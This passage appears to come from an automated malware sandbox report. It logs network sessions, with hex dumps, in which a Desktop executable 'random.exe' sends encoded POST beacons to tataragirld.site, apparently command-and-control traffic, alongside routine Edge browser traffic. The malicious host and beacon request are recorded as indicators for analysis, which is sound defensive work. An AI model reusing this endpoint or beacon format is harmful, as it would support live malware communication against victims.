                                                                                                                                                                                                                                                                                  Data Ascii: MJmmt1vNt=vr6fgI<870('y!y)0L2I)0L`v`TQ)0
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC1369INData Raw: 14 d3 19 51 29 cd c8 5d c9 38 08 00 12 00 f2 0c b4 0a f2 0c 1f ba 08 ba 0c 1c 14 49 e2 d2 c2 bd 4b 4a 30 cf 6d 91 82 e9 d7 11 50 a3 11 00 12 00 43 06 49 09 43 06 1f d0 08 d0 0c 1c 14 49 01 29 9a 98 30 0a 89 93 8a c2 d6 f4 ce f6 ce dc f8 a8 8e fa f8 c8 ce ce c6 04 00 0e 00 92 04 70 0a 92 04 1f c0 04 c0 0c 1c 14 cc 4f ca 39 a2 9e c6 d9 57 10 00 12 00 53 0b cd 0e 53 0b 1f d0 08 d0 0c 1c 14 31 01 29 9a 98 30 0a 89 93 b6 8e 9c b8 be 92 b4 9a a8 8e f0 da cc bc b0 8c 58 00 12 00 dc 0e c8 0e dc 0e 1f d0 08 d0 0c 1c 14 49 01 29 9a 98 30 0a 89 93 b6 ce dc f8 fe d2 f4 da a8 8a c2 d6 f4 ce f6 ce dc f8 a8 8e dc dc c2 d6 da a8 72 7c 4c 70 a8 8e fa f8 c8 ce ce c6 a8 b0 f4 ce dc c2 c8 da f6 a8 8e fa f8 c8 ce ce c6 a8 62 76 7e 7a 96 9c 9c 70 78 72 76 72 72 72 d8 76 94 60
                                                                                                                                                                                                                                                                                  Data Ascii: Q)]8IKJ0mPCICI)0pO9WSS1)0XI)0r|Lpbv~zpxrvrrrv`


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  1192.168.2.449738188.114.96.34437560C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC426OUTPOST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
                                                                                                                                                                                                                                                                                  n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  Content-Length: 53
                                                                                                                                                                                                                                                                                  Host: tataragirld.site
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:29 UTC53OUTData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 00 00 00 00 02 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:30 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:30 GMT
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PI7xUc69C9S0qfG7jcy2ECzpK%2FQCdv22TCseiV4IfthO79fn08%2BXEwQpnsHfP8hgAUMqkvlIRcGUraEEnTFvoQ4bbmz4gGUsJruh%2BuKfkjMct%2Fy2WIMZ8GqtGZw97gab4fF6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc671f2e8d242b8-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2196&min_rtt=2196&rtt_var=824&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1115&delivery_rate=1327272&cwnd=232&unsent_bytes=0&cid=9609a642a5631c9c&ts=325&x=0"
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:30 UTC24INData Raw: 31 32 0d 0a 00 00 00 00 02 00 00 00 00 00 00 00 fe ff ff ff 91 90 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 12
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  2192.168.2.449739188.114.96.34437560C:\Users\user\Desktop\random.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:30 UTC427OUTPOST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
                                                                                                                                                                                                                                                                                  n: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  Content-Length: 208
                                                                                                                                                                                                                                                                                  Host: tataragirld.site
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:30 UTC208OUTData Raw: 00 00 00 00 03 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 7d 00 00 00 95 00 00 00 08 00 00 00 48 58 39 15 10 10 10 10 16 10 10 10 10 10 10 10 80 a0 62 3a 35 91 31 10 10 10 10 d4 10 10 10 10 10 10 10 80 a0 62 3a b0 86 1c 1c 48 10 10 10 10 10 10 10 4a 10 4a 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 b0 86 1c 1e 10 10 10 10 10 10 10 10 10 10 10 10 12 10 10 10 b0 86 1a 1c 10 10 10 10 ef ef ef ef ef ef ef ef ef ef ef ef 10 10 ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef a1 93 f8 8b eb 46 89 93 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                  Data Ascii: }HX9b:51b:HJJF
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:30 UTC795INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:30 GMT
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  v: 0gHlCoLSAmh/w1kHxjh3xUphMOa2Y4sQdkrr3k64NNJT0myRaJGfGrdU
                                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xkznsSwiiLvdwKAYz4QfHOZ20zp7XOS%2Bpv46J%2F8KQJzfe1LGn7O10R%2B7DoO8mOsUSi3UlIsmtBH%2Bl9Fu6k2m30AV3s3YCUB%2BDmlFN9shO%2Bl%2FZrSK0PZkLCqaQvA2AT7x9XRy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc671f7ffd242d2-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1799&rtt_var=685&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1271&delivery_rate=1586094&cwnd=229&unsent_bytes=0&cid=f8e0fc2cd9c83e8f&ts=314&x=0"


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  3192.168.2.449754172.217.16.1934437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC6RqRxSJhKMZtXOIyTdKMdsL5jZBTIpd6G6VtVi6FOWMhVGRKQYd1cO-IwR5TSKk2m9
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 15:58:13 GMT
                                                                                                                                                                                                                                                                                  Expires: Sat, 03 Jan 2026 15:58:13 GMT
                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                  Age: 23668
                                                                                                                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                  Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                                  Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                                  Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                                  Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                                  Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                  Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                  Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                  Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                  Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:41 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                  Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  4192.168.2.449779172.64.41.34437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:43 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672472f13de93-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
